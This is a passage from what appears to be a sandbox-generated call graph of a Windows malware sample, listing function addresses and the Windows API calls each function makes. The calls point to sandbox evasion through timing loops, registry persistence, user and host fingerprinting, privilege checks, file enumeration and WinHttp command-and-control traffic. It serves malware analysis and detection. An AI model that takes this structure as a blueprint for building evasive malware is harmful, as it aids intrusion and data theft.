LocalFree GetProcessHeap HeapFree 12232->12233 12233->12227 12235 40c0fa IsSystemResumeAutomatic 12234->12235 12236 40c107 12235->12236 12236->12235 12237 40c127 GetProcessHeap HeapAlloc 12236->12237 12238 40c18a GetClipboardSequenceNumber 12237->12238 12239 40c197 12238->12239 12239->12238 12240 40c1b7 GetModuleHandleA GetProcAddress GlobalMemoryStatusEx 12239->12240 12241 40c1f8 GetSystemInfo 12240->12241 12244 40c1f4 12240->12244 12242 40c1fe GetProcessHeap HeapAlloc 12241->12242 12243 40c32e GetDesktopWindow 12242->12243 12245 40c33b 12243->12245 12244->12242 12245->12243 12246 40c357 RegOpenKeyW 12245->12246 12247 40c37d GetProcessHeap HeapAlloc 12246->12247 12250 40c54d 12246->12250 12248 40c403 GetClipboardViewer 12247->12248 12251 40c410 12248->12251 12249 40c592 6 API calls 12249->12055 12250->12249 12252 40c569 Sleep 12250->12252 12255 40c58a 12250->12255 12251->12248 12253 40c42c RegQueryValueExW 12251->12253 12252->12250 12252->12255 12254 40c462 12253->12254 12254->12254 12256 40c479 GetProcessHeap HeapAlloc 12254->12256 12257 40c52f RegCloseKey GetProcessHeap HeapFree 12254->12257 12255->12249 12258 40c4c0 CountClipboardFormats 12256->12258 12257->12250 12259 40c4cd 12258->12259 12259->12258 12260 40c4e9 StrStrIW 12259->12260 12261 40c516 12260->12261 12262 40c51a GetProcessHeap HeapFree 12261->12262 12263 40c500 Sleep StrStrIW 12261->12263 12262->12257 12263->12261 12506 40a7d8 GetProcessHeap HeapAlloc 12264->12506 12266 40a999 12267 40a9a2 GetProcessHeap HeapAlloc 12266->12267 12515 40a973 12266->12515 12268 40a9f3 GetCapture 12267->12268 12270 40aa00 12268->12270 12270->12268 12271 40aa18 GetModuleHandleA 12270->12271 12272 40aa29 12271->12272 12273 40aa2e GetProcessHeap HeapAlloc 12271->12273 12274 40a973 2 API calls 12272->12274 12275 40aa75 GetOpenClipboardWindow 12273->12275 12274->12273 12276 40aa82 12275->12276 12276->12275 12277 40aa9a GetModuleHandleA 12276->12277 12278 40aaab 12277->12278 12279 40aab0 GetUserNameA 12277->12279 12282 40a973 2 API calls 12278->12282 12280 40aad5 GetProcessHeap HeapAlloc 12279->12280 12281 40aad0 12279->12281 12283 40ab16 GetClipboardViewer 12280->12283 12284 40a973 2 API calls 12281->12284 12282->12279 12285 40ab23 12283->12285 12284->12280 12285->12283 12286 40ab3b lstrcmpA 12285->12286 12287 40ab56 GetProcessHeap HeapAlloc 12286->12287 12288 40ab51 12286->12288 12290 40ab95 GetFocus 12287->12290 12289 40a973 2 API calls 12288->12289 12289->12287 12291 40aba2 12290->12291 12291->12290 12292 40abba lstrcmpA 12291->12292 12293 40abd6 GetComputerNameA 12292->12293 12294 40abd1 12292->12294 12296 40abf7 GetProcessHeap HeapAlloc 12293->12296 12297 40abf2 12293->12297 12295 40a973 2 API calls 12294->12295 12295->12293 12298 40ac30 GetCursor 12296->12298 12299 40a973 2 API calls 12297->12299 12300 40ac3d 12298->12300 12299->12296 12300->12298 12301 40ac55 lstrcmpA 12300->12301 12302 40ac6b 12301->12302 12303 40ac70 GetProcessHeap HeapAlloc 12301->12303 12304 40a973 2 API calls 12302->12304 12305 40aca7 GetMenuCheckMarkDimensions 12303->12305 12304->12303 12306 40acb4 12305->12306 12306->12305 12307 40accc lstrcmpA 12306->12307 12308 40ace2 12307->12308 12309 40ace7 GetProcessHeap HeapAlloc 12307->12309 12310 40a973 2 API calls 12308->12310 12311 40ad53 GetMessageExtraInfo 12309->12311 12310->12309 12312 40ad60 12311->12312 12312->12311 12313 40ad78 GetProcessHeap HeapAlloc 12312->12313 12314 40adce GetClipboardOwner 12313->12314 12315 40addb 12314->12315 12315->12314 12316 40adf3 12315->12316 12519 40a77c RegCreateKeyA 12316->12519 12319 40ae13 GetProcessHeap HeapAlloc 12321 40ae4f GetLastError 12319->12321 12320 40a973 2 API calls 12320->12319 12322 40ae5c 12321->12322 12322->12321 12323 40ae76 GetProcessHeap HeapAlloc 12322->12323 12324 40aeb8 CountClipboardFormats 12323->12324 12325 40aec5 12324->12325 12325->12324 12326 40aedf GetProcessHeap HeapAlloc 12325->12326 12327 40af1e GetFocus 12326->12327 12328 40af2b 12327->12328 12328->12327 12329 40af45 GetProcessHeap HeapAlloc 12328->12329 12330 40af89 GetMessageExtraInfo 12329->12330 12331 40af96 12330->12331 12331->12330 12332 40afb0 GetProcessHeap HeapAlloc 12331->12332 12333 40aff4 GetForegroundWindow 12332->12333 12334 40b001 12333->12334 12334->12333 12335 40b01b GetProcessHeap HeapAlloc 12334->12335 12336 40b072 GetProcessWindowStation 12335->12336 12337 40b07f 12336->12337 12337->12336 12338 40b097 GetProcessHeap HeapAlloc 12337->12338 12339 40b0da GetModuleHandleW 12338->12339 12340 40b0e9 12339->12340 12340->12339 12341 40b101 GetProcessHeap HeapAlloc 12340->12341 12342 40b13f GetCapture 12341->12342 12343 40b14c 12342->12343 12343->12342 12344 40b166 12343->12344 12345 40b1c2 StrStrA 12344->12345 12346 40a973 2 API calls 12344->12346 12347 40b1e4 GetProcessHeap HeapAlloc 12344->12347 12345->12344 12346->12344 12348 40b22d IsSystemResumeAutomatic 12347->12348 12349 40b23a 12348->12349 12349->12348 12350 40b252 12349->12350 12351 40a77c 3 API calls 12350->12351 12353 40b261 12351->12353 12352 40b272 GetProcessHeap HeapAlloc 12355 40b2b7 GetCurrentThreadId 12352->12355 12353->12352 12354 40a973 2 API calls 12353->12354 12354->12352 12356 40b2c4 12355->12356 12356->12355 12357 40b2dc StrStrA 12356->12357 12358 40b2f7 GetProcessHeap HeapAlloc 12357->12358 12359 40b2f2 12357->12359 12360 40b380 GetClipboardSequenceNumber 12358->12360 12361 40a973 2 API calls 12359->12361 12362 40b38d 12360->12362 12361->12358 12362->12360 12363 40b3a5 12362->12363 12364 40a77c 3 API calls 12363->12364 12365 40b3b1 12364->12365 12366 40b3c2 GetProcessHeap HeapAlloc 12365->12366 12367 40a973 2 API calls 12365->12367 12368 40b427 ReleaseCapture 12366->12368 12367->12366 12369 40b434 12368->12369 12369->12368 12370 40b44c StrStrA 12369->12370 12371 40b462 12370->12371 12372 40b467 GetProcessHeap HeapAlloc 12370->12372 12374 40a973 2 API calls 12371->12374 12373 40b4ce GetProcessWindowStation 12372->12373 12375 40b4db 12373->12375 12374->12372 12375->12373 12376 40b4f3 StrStrA 12375->12376 12377 40b50e GetProcessHeap HeapAlloc 12376->12377 12378 40b509 12376->12378 12380 40b569 GetMenuCheckMarkDimensions 12377->12380 12379 40a973 2 API calls 12378->12379 12379->12377 12381 40b576 12380->12381 12381->12380 12382 40b58e StrStrA 12381->12382 12383 40b5a7 12382->12383 12384 40b5ac 44 API calls 12382->12384 12385 40a973 2 API calls 12383->12385 12384->12051 12385->12384 12388 40b6ee 12386->12388 12387 40e0ef 39 API calls 12387->12388 12388->12387 12389 40b712 12388->12389 12389->12051 12522 4073b6 GetProcessHeap HeapAlloc 12390->12522 12392 40e71e 12393 40e684 2 API calls 12392->12393 12394 40e723 GetProcessHeap HeapAlloc 12393->12394 12395 40e745 GetComputerNameW 12394->12395 12396 40e7ed AllocateAndInitializeSid 12394->12396 12397 40e75f GetProcessHeap HeapAlloc 12395->12397 12398 40e7e8 12395->12398 12399 40e822 CheckTokenMembership FreeSid 12396->12399 12400 40e851 CreateWellKnownSid 12396->12400 12403 40e79c GetClipboardOwner 12397->12403 12529 40e310 RegOpenKeyExA 12398->12529 12399->12400 12407 40e841 12399->12407 12401 40e873 CheckTokenMembership 12400->12401 12402 40e84f 12400->12402 12401->12402 12406 401a31 12402->12406 12409 40e897 11 API calls 12402->12409 12405 40e7a9 12403->12405 12405->12403 12410 40e7c8 lstrcpyW GetProcessHeap HeapFree 12405->12410 12411 4041e5 GetProcessHeap HeapAlloc 12406->12411 12407->12406 12542 40e967 12407->12542 12409->12406 12410->12398 12412 404255 GetShellWindow 12411->12412 12413 404262 12412->12413 12413->12412 12414 40427a GetProcessHeap HeapAlloc 12413->12414 12415 4042cd GetDoubleClickTime 12414->12415 12416 4042da 12415->12416 12416->12415 12417 4042f2 LoadLibraryA GetProcAddress 12416->12417 12418 40432f 12417->12418 12419 40433d GetProcessHeap HeapAlloc 12418->12419 12420 404501 GetProcessHeap HeapFree GetProcessHeap HeapFree 12418->12420 12421 404390 GetDialogBaseUnits 12419->12421 12420->12065 12422 40439d 12421->12422 12422->12421 12423 4043b5 LoadLibraryA GetProcAddress 12422->12423 12424 4043d2 12423->12424 12425 4043e0 GetProcessHeap HeapAlloc 12424->12425 12426 4044e9 CloseHandle GetProcessHeap HeapFree 12424->12426 12427 404433 CloseClipboard 12425->12427 12426->12420 12428 404440 12427->12428 12428->12427 12429 404458 LoadLibraryA GetProcAddress 12428->12429 12430 40447c GetProcessHeap HeapAlloc 12429->12430 12431 4044d1 CloseHandle GetProcessHeap HeapFree 12430->12431 12432 404497 GetProcessHeap HeapFree 12430->12432 12431->12426 12432->12431 12546 40f5d9 GetProcessHeap HeapAlloc 12434->12546 12436 40bf20 12437 40f5d9 12 API calls 12436->12437 12438 40bf2a 12437->12438 12554 40bb40 GetProcessHeap HeapAlloc 12438->12554 12441 40c04c 12441->12062 12442 40bb40 36 API calls 12443 40bf62 12442->12443 12443->12441 12444 40bf6d GetProcessHeap HeapAlloc 12443->12444 12445 40bfab GetFocus 12444->12445 12446 40bfb8 12445->12446 12446->12445 12447 40bfd7 lstrcatW 12446->12447 12448 40bb40 36 API calls 12447->12448 12449 40bffe 12448->12449 12450 40c040 GetProcessHeap HeapFree 12449->12450 12451 40c00b GetTickCount 12449->12451 12450->12441 12452 40bb40 36 API calls 12451->12452 12453 40c032 12452->12453 12453->12450 12455 401a92 VirtualProtect 12454->12455 12456 40fcd2 GetProcessHeap HeapAlloc 12455->12456 12457 40fd64 GetDialogBaseUnits 12456->12457 12458 40fd71 12457->12458 12458->12457 12459 40fd89 RegOpenKeyExW 12458->12459 12460 40fe6b GetProcessHeap HeapFree 12459->12460 12461 40fdac GetProcessHeap HeapAlloc 12459->12461 12460->12068 12462 40fe14 CloseClipboard 12461->12462 12463 40fe21 12462->12463 12463->12462 12464 40fe39 RegSetValueExW RegCloseKey GetProcessHeap HeapFree 12463->12464 12464->12460 12466 40d97f 6 API calls 12465->12466 12467 40da06 CreateFileW 12466->12467 12468 40da8b GetLastError 12467->12468 12469 40da2c GetFileSize 12467->12469 12475 40da3a 12468->12475 12470 40da41 GetProcessHeap HeapAlloc 12469->12470 12469->12475 12470->12468 12472 40da5a ReadFile 12470->12472 12471 40da98 CloseHandle 12474 40da9f 12471->12474 12472->12468 12472->12475 12473 40dab9 12477 401adf 12473->12477 12478 40dac0 GetProcessHeap HeapFree 12473->12478 12474->12473 12476 40daad GetProcessHeap HeapFree 12474->12476 12475->12471 12475->12474 12476->12473 12477->12073 12479 40e684 GetModuleHandleA GetProcAddress 12477->12479 12478->12477 12480 401aeb 12479->12480 12481 4016a9 GetProcessHeap HeapAlloc 12480->12481 12482 40e684 2 API calls 12481->12482 12483 4016db 12482->12483 12484 4016e6 GetProcessHeap HeapAlloc 12483->12484 12486 4016df GetProcessHeap HeapFree 12483->12486 12485 4017c1 GetActiveWindow 12484->12485 12487 4017ce 12485->12487 12486->12073 12487->12485 12488 4017e6 ExpandEnvironmentStringsW GetProcessHeap HeapAlloc 12487->12488 12489 401854 GetCaretBlinkTime 12488->12489 12490 401861 12489->12490 12490->12489 12491 401879 StrStrIW 12490->12491 12492 40188f GetProcessHeap HeapAlloc 12491->12492 12493 401955 StrCatW 12491->12493 12494 401908 GetModuleHandleW 12492->12494 12495 40dd0b 32 API calls 12493->12495 12496 401917 12494->12496 12497 401970 12495->12497 12496->12494 12498 40192f ExpandEnvironmentStringsW GetProcessHeap HeapFree 12496->12498 12499 401995 6 API calls 12497->12499 12500 408761 17 API calls 12497->12500 12498->12493 12499->12486 12501 401983 12500->12501 12578 40d8ba 6 API calls 12501->12578 12507 40a868 GetMessageExtraInfo 12506->12507 12508 40a875 12507->12508 12508->12507 12509 40a890 GetProcessHeap HeapAlloc 12508->12509 12510 40a8ea GetDoubleClickTime 12509->12510 12511 40a8f7 12510->12511 12511->12510 12512 40a90f LoadLibraryA GetProcAddress 12511->12512 12513 40a928 GetProcessHeap HeapFree GetProcessHeap HeapFree 12512->12513 12513->12266 12516 40a980 GetTickCount 12515->12516 12517 40a975 Sleep 12516->12517 12518 40a98a 12516->12518 12517->12516 12518->12267 12520 40a7d0 12519->12520 12521 40a79f RegQueryValueExA RegCloseKey 12519->12521 12520->12319 12520->12320 12521->12520 12523 407406 GetLogicalDrives 12522->12523 12524 407413 12523->12524 12524->12523 12525 407432 GetProcessHeap HeapAlloc 12524->12525 12526 407477 IsSystemResumeAutomatic 12525->12526 12527 407484 12526->12527 12527->12526 12528 4074a3 6 API calls 12527->12528 12528->12392 12530 40e3ad GetProcessHeap HeapAlloc RegQueryValueExA RegQueryValueExA 12529->12530 12531 40e540 12529->12531 12532 40e417 12530->12532 12531->12396 12533 40e496 RegCloseKey lstrlenA 12532->12533 12534 40e422 RegQueryValueExA 12532->12534 12535 40e4b1 12533->12535 12536 40e4bf GetProcessHeap HeapAlloc GetComputerNameA lstrlenA 12533->12536 12537 40e445 GetTickCount RegCloseKey RegOpenKeyExA 12534->12537 12541 40e48c 12534->12541 12535->12535 12535->12536 12538 40e4f2 12536->12538 12539 40e500 GetProcessHeap HeapFree GetProcessHeap HeapFree 12536->12539 12540 40e471 RegSetValueExA 12537->12540 12537->12541 12538->12538 12538->12539 12539->12531 12540->12541 12541->12533 12543 40e9b3 12542->12543 12544 40e97b GetCurrentProcess OpenProcessToken 12542->12544 12543->12402 12544->12543 12545 40e995 GetTokenInformation CloseHandle 12544->12545 12545->12543 12547 40f62d GetShellWindow 12546->12547 12548 40f63a 12547->12548 12548->12547 12549 40f655 GetProcessHeap HeapAlloc 12548->12549 12550 40f68f GetLogicalDrives 12549->12550 12551 40f69c 12550->12551 12551->12550 12552 40f6b4 GetModuleHandleA GetProcAddress 12551->12552 12553 40f6cb GetProcessHeap HeapFree GetProcessHeap HeapFree 12552->12553 12553->12436 12555 40bb7f GetProcessHeap HeapAlloc 12554->12555 12556 40be10 12554->12556 12557 40be03 GetProcessHeap HeapFree 12555->12557 12558 40bb96 GetProcessHeap HeapAlloc 12555->12558 12556->12441 12556->12442 12557->12556 12559 40bbad GetProcessHeap HeapAlloc 12558->12559 12560 40bdf4 GetProcessHeap HeapFree 12558->12560 12561 40bbf9 ReleaseCapture 12559->12561 12560->12557 12562 40bc06 12561->12562 12562->12561 12563 40bc25 12562->12563 12563->12563 12564 40bc3d GetSystemDirectoryW 12563->12564 12565 40bdd5 GetProcessHeap HeapFree 12564->12565 12566 40bc5b 12564->12566 12567 40bde4 GetProcessHeap HeapFree 12565->12567 12569 40f5d9 12 API calls 12566->12569 12572 40bc77 lstrcatW FindFirstFileW 12566->12572 12567->12560 12570 40bc69 12569->12570 12571 40f5d9 12 API calls 12570->12571 12571->12572 12572->12565 12574 40bca2 12572->12574 12573 40bda6 FindClose 12573->12567 12574->12573 12575 40bcca StrRChrW 12574->12575 12576 40bd82 FindNextFileW 12574->12576 12575->12574 12576->12574 12577 40bd8e FindFirstFileW 12576->12577 12577->12574 12579 40d957 FreeSid 12578->12579 12580 40d960 12578->12580 12579->12580 12581 40d971 12580->12581 12582 40d96c LocalFree 12580->12582 12583 40d975 LocalFree 12581->12583 12584 40198b 12581->12584 12582->12581 12583->12584 12585 401560 12584->12585 12603 401000 12585->12603 12588 401589 StrDupW 12590 4015a0 12588->12590 12589 401684 12589->12499 12591 401642 12590->12591 12592 4015b1 GetProcessHeap HeapAlloc 12590->12592 12594 40dd0b 32 API calls 12591->12594 12593 4015e8 GetClipboardViewer 12592->12593 12595 4015f5 12593->12595 12596 401650 12594->12596 12595->12593 12597 401614 GetProcessHeap HeapFree 12595->12597 12598 40165d 12596->12598 12611 40110c GetProcessHeap HeapAlloc 12596->12611 12597->12591 12599 401675 GetProcessHeap HeapFree 12598->12599 12600 401669 GetProcessHeap HeapFree 12598->12600 12599->12589 12600->12599 12635 40a626 GetProcessHeap HeapAlloc 12603->12635 12605 401101 12605->12588 12605->12589 12606 40101d 12606->12605 12606->12606 12607 401061 GetProcessHeap HeapAlloc wsprintfW 12606->12607 12608 4010a6 lstrlenW GetProcessHeap HeapAlloc WideCharToMultiByte 12607->12608 12609 4010a0 GetProcessHeap HeapFree 12607->12609 12608->12609 12609->12605 12612 40119f CountClipboardFormats 12611->12612 12613 4011ac 12612->12613 12613->12612 12614 4011c4 GetProcessHeap HeapAlloc 12613->12614 12615 4012ea GetDialogBaseUnits 12614->12615 12616 4012f7 12615->12616 12616->12615 12617 40130f 12616->12617 12656 4038f7 12617->12656 12620 401332 GetProcessHeap HeapAlloc 12622 401372 GetDialogBaseUnits 12620->12622 12621 40153e GetProcessHeap HeapFree GetProcessHeap HeapFree 12621->12598 12623 40137f 12622->12623 12623->12622 12624 40139a GetProcessHeap HeapAlloc 12623->12624 12625 4013e0 GetCurrentThreadId 12624->12625 12626 4013ed 12625->12626 12626->12625 12627 401408 GetProcessHeap HeapAlloc 12626->12627 12628 401458 ReleaseCapture 12627->12628 12629 401465 12628->12629 12629->12628 12630 401480 RegSetValueExW 12629->12630 12631 4014a8 12630->12631 12631->12631 12632 4014b7 RegSetValueExW 12631->12632 12633 4014de 12632->12633 12633->12633 12634 4014ed 8 API calls 12633->12634 12634->12621 12636 40a6c5 GetCurrentThreadId 12635->12636 12637 40a6d2 12636->12637 12637->12636 12638 40a6f4 12637->12638 12646 40a4dc GetProcessHeap HeapAlloc 12638->12646 12640 40a6f9 12641 40a70a GetProcessHeap HeapAlloc 12640->12641 12644 40a758 12640->12644 12642 40a763 GetProcessHeap HeapFree 12641->12642 12643 40a726 12641->12643 12642->12606 12643->12644 12645 40a4dc 12 API calls 12643->12645 12644->12642 12645->12643 12647 40a52a GetMessagePos 12646->12647 12648 40a537 12647->12648 12648->12647 12649 40a54f 12648->12649 12650 40a562 GetProcessHeap HeapAlloc 12649->12650 12653 40a5fd GetProcessHeap HeapFree 12649->12653 12651 40a5aa GetCurrentThreadId 12650->12651 12652 40a5b7 12651->12652 12652->12651 12655 40a5cf LoadLibraryA GetProcAddress GetProcessHeap HeapFree 12652->12655 12653->12640 12655->12653 12657 403919 RegCreateKeyExW 12656->12657 12658 403932 RegOpenKeyExW 12656->12658 12659 40131b 12657->12659 12658->12659 12659->12620 12659->12621 12661 40be1a 7 API calls 12660->12661 12662 40c74f 12661->12662 12663 40c77c VirtualProtect 12662->12663 12664 40c055 36 API calls 12662->12664 12665 40c7a0 12663->12665 12666 40c7b8 GetModuleHandleW 12663->12666 12667 40c758 12664->12667 12671 40c7a7 VirtualProtect 12665->12671 12668 40e6ed 66 API calls 12666->12668 12669 40a98b 140 API calls 12667->12669 12670 40c7d3 GetUserNameW 12668->12670 12672 40c75d 12669->12672 12673 40c828 GetProcessHeap HeapAlloc 12670->12673 12674 40c8b0 12670->12674 12671->12666 12672->12663 12676 40b6b4 39 API calls 12672->12676 12681 40c76f Sleep 12672->12681 12683 40b71e 39 API calls 12672->12683 12675 40c86b GetTickCount 12673->12675 12677 4041e5 32 API calls 12674->12677 12678 40c878 12675->12678 12676->12672 12688 40c8b8 12677->12688 12678->12675 12679 40c890 SetEnvironmentVariableW GetProcessHeap HeapFree 12678->12679 12679->12674 12680 40cab4 12722 40c5e5 WSAStartup socket 12680->12722 12681->12672 12683->12672 12685 40bf00 43 API calls 12689 40c8fe 12685->12689 12686 40cb07 GetCommandLineA 12687 40cb14 12686->12687 12687->12686 12690 40cb2f GetProcessHeap HeapAlloc 12687->12690 12688->12680 12688->12685 12689->12680 12691 40c97e GetProcessHeap HeapAlloc 12689->12691 12692 40c90f GetProcessHeap HeapAlloc 12689->12692 12693 40cb71 GetCommandLineA 12690->12693 12696 40ca5b GetProcessHeap 12691->12696 12694 40c951 CreatePopupMenu 12692->12694 12695 40cb7e 12693->12695 12697 40c95e 12694->12697 12695->12693 12698 40cb99 GetProcessHeap HeapAlloc 12695->12698 12699 40ca64 12696->12699 12697->12694 12702 40c979 12697->12702 12700 40cbd2 GetOpenClipboardWindow 12698->12700 12699->12696 12701 40ca7f ConvertStringSecurityDescriptorToSecurityDescriptorA GetProcessHeap HeapFree 12699->12701 12703 40cbdf 12700->12703 12701->12680 12702->12701 12703->12700 12704 40cc03 wsprintfA 12703->12704 12705 404521 17 API calls 12704->12705 12706 40cc20 GetProcessHeap HeapAlloc 12705->12706 12707 40cc62 GetTickCount 12706->12707 12708 40cc6f 12707->12708 12708->12707 12709 40cc8a wsprintfA GetProcessHeap HeapAlloc 12708->12709 12710 40ccd7 GetActiveWindow 12709->12710 12711 40cce4 12710->12711 12711->12710 12712 40cd01 GetProcessHeap HeapAlloc 12711->12712 12713 40cd42 GetLogicalDrives 12712->12713 12714 40cd4f 12713->12714 12714->12713 12715 40cd6a GetProcessHeap HeapAlloc 12714->12715 12716 40cdc5 GetModuleHandleW 12715->12716 12717 40cdd4 12716->12717 12717->12716 12718 40cdef GetProcessHeap HeapAlloc 12717->12718 12719 40ce3e GetOpenClipboardWindow 12718->12719 12720 40ce4b 12719->12720 12720->12719 12721 40ce63 29 API calls 12720->12721 12732 40d38e 12721->12732 12743 407294 12721->12743 12756 4033f3 WSAStartup 12721->12756 12777 40168c 12721->12777 12781 4028ec 12721->12781 12723 40c622 GetCurrentProcessId 12722->12723 12731 40c714 GetProcessHeap HeapAlloc 12722->12731 12724 40c642 12723->12724 12723->12731 12725 40c671 GetProcessHeap HeapAlloc 12724->12725 12726 40c692 GetProcessWindowStation 12725->12726 12727 40c69f 12726->12727 12727->12726 12728 40c6b8 inet_addr htons bind 12727->12728 12729 40c6f1 GetProcessHeap HeapFree 12728->12729 12730 40c716 closesocket GetProcessHeap HeapFree 12728->12730 12729->12725 12729->12731 12730->12731 12731->12686 12788 40cf97 12732->12788 12735 40d4bf 12737 40d4b0 Sleep 12737->12735 12739 40d3cf 12737->12739 12739->12737 12740 40dd0b 32 API calls 12739->12740 12741 40d8ba 9 API calls 12739->12741 12798 40d076 GetProcessHeap HeapAlloc 12739->12798 12821 40482b 12739->12821 12740->12739 12742 40d472 CreateThread CloseHandle 12741->12742 12742->12739 12926 40d354 12742->12926 12744 4072a7 WaitForSingleObject 12743->12744 12745 40731e 12743->12745 12744->12745 12746 4072b9 12744->12746 12745->12745 12750 40735e CreateThread CloseHandle 12745->12750 12746->12745 12747 4072c1 GetCurrentProcessId 12746->12747 12934 40485c GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 12747->12934 12751 40737e 12750->12751 12752 4073ad 12750->12752 12753 40e0ef 39 API calls 12751->12753 12754 4073a0 Sleep 12751->12754 12755 407399 Sleep 12751->12755 12753->12751 12754->12751 12754->12752 12755->12754 12757 404521 17 API calls 12756->12757 12758 403439 12757->12758 12759 403451 12758->12759 12760 40343d SetEvent ExitThread 12758->12760 12953 403e17 GetProcessHeap HeapAlloc 12759->12953 12763 403547 12767 403513 Sleep 12774 403491 12767->12774 12768 40482b 2 API calls 12770 403480 SetEvent 12768->12770 12770->12774 12773 403300 20 API calls 12773->12774 12774->12763 12774->12767 12774->12773 12775 40482b 2 API calls 12774->12775 12990 403199 GetProcessHeap HeapAlloc 12774->12990 12998 40b9e6 GetProcessHeap HeapAlloc 12774->12998 13009 402915 12774->13009 13017 403adc GetProcessHeap HeapAlloc 12774->13017 12776 403507 SetEvent 12775->12776 12776->12767 12778 401691 Sleep 12777->12778 12779 401560 101 API calls 12778->12779 12780 4016a2 12779->12780 12780->12778 12783 4028ff 12781->12783 12784 402908 12783->12784 12785 4028f4 Sleep 12783->12785 13070 4022e6 GetProfilesDirectoryW 12783->13070 13112 40229e 12784->13112 12785->12783 12789 40cfa8 CreateFileW 12788->12789 12790 40d05f Sleep 12789->12790 12791 40cfcf ReadFile 12789->12791 12790->12789 12792 40d042 CloseHandle 12791->12792 12795 40cfec 12791->12795 12793 40d9f1 17 API calls 12792->12793 12794 40d05a 12793->12794 12794->12790 12796 40d06f Sleep 12794->12796 12795->12792 12795->12795 12797 40d01d ReadFile 12795->12797 12796->12735 12796->12739 12797->12795 12799 40d10f GetCapture 12798->12799 12800 40d11c 12799->12800 12800->12799 12801 40d13b WSAStartup 12800->12801 12802 40d160 12801->12802 12803 40d1b4 GetProcessHeap HeapAlloc 12802->12803 12804 40d2f6 12802->12804 12810 40d2cc GetProcessHeap HeapFree 12802->12810 12811 40d31b 12802->12811 12813 40482b 2 API calls 12802->12813 12816 40d2f8 12802->12816 12805 40d20e GetCurrentThreadId 12803->12805 12806 40d332 GetProcessHeap HeapFree 12804->12806 12807 40d21b 12805->12807 12806->12739 12807->12805 12808 40d236 wsprintfA 12807->12808 12825 40314d 12808->12825 12810->12802 12812 40482b 2 API calls 12811->12812 12814 40d323 GetProcessHeap HeapFree 12812->12814 12815 40d282 Sleep 12813->12815 12814->12804 12815->12810 12831 4047d4 12816->12831 12819 40482b 2 API calls 12820 40d30d GetProcessHeap HeapFree 12819->12820 12820->12806 12822 404852 12821->12822 12823 404832 12821->12823 12822->12739 12823->12822 12824 40483a GetProcessHeap HeapFree 12823->12824 12824->12822 12828 40315f 12825->12828 12827 403183 12829 40318e 12827->12829 12830 40482b 2 API calls 12827->12830 12828->12827 12836 40298e 12828->12836 12829->12802 12830->12829 12832 4047de 12831->12832 12835 404811 12831->12835 12833 4047fd GetProcessHeap HeapAlloc 12832->12833 12834 4047ef GetProcessHeap HeapFree 12832->12834 12832->12835 12833->12835 12834->12833 12835->12819 12837 4029c4 gethostbyname 12836->12837 12839 402a29 12837->12839 12840 402a31 12837->12840 12839->12828 12841 402c68 12840->12841 12842 402a56 GetProcessHeap HeapAlloc 12840->12842 12844 402c84 lstrlenA GetProcessHeap HeapAlloc MultiByteToWideChar 12841->12844 12845 402c6c 12841->12845 12843 402c05 GetTickCount 12842->12843 12846 402c12 12843->12846 12847 402cb6 WinHttpConnect GetProcessHeap HeapAlloc 12844->12847 12845->12847 12846->12843 12848 402c30 WinHttpOpen 12846->12848 12849 402d2f GetMessageTime 12847->12849 12850 402c73 GetProcessHeap HeapFree 12848->12850 12851 402c49 WinHttpSetTimeouts GetProcessHeap HeapFree 12848->12851 12852 402d3c 12849->12852 12850->12839 12851->12841 12852->12849 12853 402d5a wsprintfW GetProcessHeap HeapFree 12852->12853 12854 402d8a 12853->12854 12855 403128 GetProcessHeap HeapFree 12853->12855 12856 402d96 lstrlenA GetProcessHeap HeapAlloc MultiByteToWideChar 12854->12856 12857 402d91 12854->12857 12855->12839 12858 40313b WinHttpCloseHandle 12855->12858 12859 402dce GetProcessHeap HeapAlloc 12856->12859 12857->12859 12858->12839 12860 402e08 GetDesktopWindow 12859->12860 12861 402e15 12860->12861 12861->12860 12862 402e2d WinHttpOpenRequest GetProcessHeap HeapFree 12861->12862 12863 402e65 12862->12863 12882 403069 12862->12882 12885 4035a5 WinHttpGetIEProxyConfigForCurrentUser 12863->12885 12866 40310c WinHttpCloseHandle 12867 403113 GetProcessHeap HeapFree 12866->12867 12867->12855 12868 402e8e WinHttpSetOption 12869 402eb1 WinHttpSetOption WinHttpSetOption 12868->12869 12870 402edf GetProcessHeap HeapAlloc 12869->12870 12871 402fbd WinHttpSendRequest 12869->12871 12873 402f47 GetDialogBaseUnits 12870->12873 12872 402fd5 WinHttpReceiveResponse 12871->12872 12871->12882 12874 402fe6 WinHttpQueryHeaders 12872->12874 12872->12882 12875 402f54 12873->12875 12876 40302b WinHttpQueryHeaders 12874->12876 12877 403023 12874->12877 12875->12873 12878 402f6c wsprintfW lstrlenW WinHttpAddRequestHeaders GetProcessHeap HeapFree 12875->12878 12879 40305d 12876->12879 12877->12876 12878->12871 12880 40307e GetProcessHeap HeapAlloc 12879->12880 12881 40309c 12879->12881 12879->12882 12880->12881 12881->12882 12883 4030a6 WinHttpQueryDataAvailable 12881->12883 12882->12866 12882->12867 12883->12882 12884 4030b9 WinHttpReadData 12883->12884 12884->12881 12884->12882 12886 4035ee 12885->12886 12887 403899 12885->12887 12923 403551 12886->12923 12889 4038a7 GlobalFree 12887->12889 12890 4038ac 12887->12890 12889->12890 12891 4038b6 12890->12891 12892 4038b3 GlobalFree 12890->12892 12894 402e8a 12891->12894 12895 4038bc GlobalFree 12891->12895 12892->12891 12893 4035fb 12893->12887 12896 403616 WinHttpOpen 12893->12896 12897 4036e2 12893->12897 12894->12868 12894->12869 12895->12894 12896->12897 12898 40362f WinHttpGetProxyForUrl 12896->12898 12897->12887 12902 40371b 12897->12902 12913 4036f5 PathMatchSpecW 12897->12913 12900 4036bf WinHttpCloseHandle 12898->12900 12901 403681 12898->12901 12904 4036d7 12900->12904 12905 4036d2 GlobalFree 12900->12905 12901->12900 12903 403687 StrCpyW WinHttpCloseHandle 12901->12903 12908 403729 StrCpyW 12902->12908 12909 403738 GetProcessHeap HeapAlloc 12902->12909 12906 4036ab 12903->12906 12907 4036a6 GlobalFree 12903->12907 12904->12897 12910 4036dd GlobalFree 12904->12910 12905->12904 12906->12887 12912 4036b5 GlobalFree 12906->12912 12907->12906 12908->12887 12911 40378b GetDoubleClickTime 12909->12911 12910->12897 12914 403798 12911->12914 12912->12887 12913->12887 12913->12897 12914->12911 12915 4037ba GetProcessHeap HeapAlloc 12914->12915 12916 4037f7 GetCurrentThreadId 12915->12916 12917 403804 12916->12917 12917->12916 12918 40381c StrStrIW 12917->12918 12921 403844 12918->12921 12919 40384a StrStrIW 12919->12921 12920 40387d GetProcessHeap HeapFree GetProcessHeap HeapFree 12920->12887 12921->12919 12921->12920 12922 4038ca 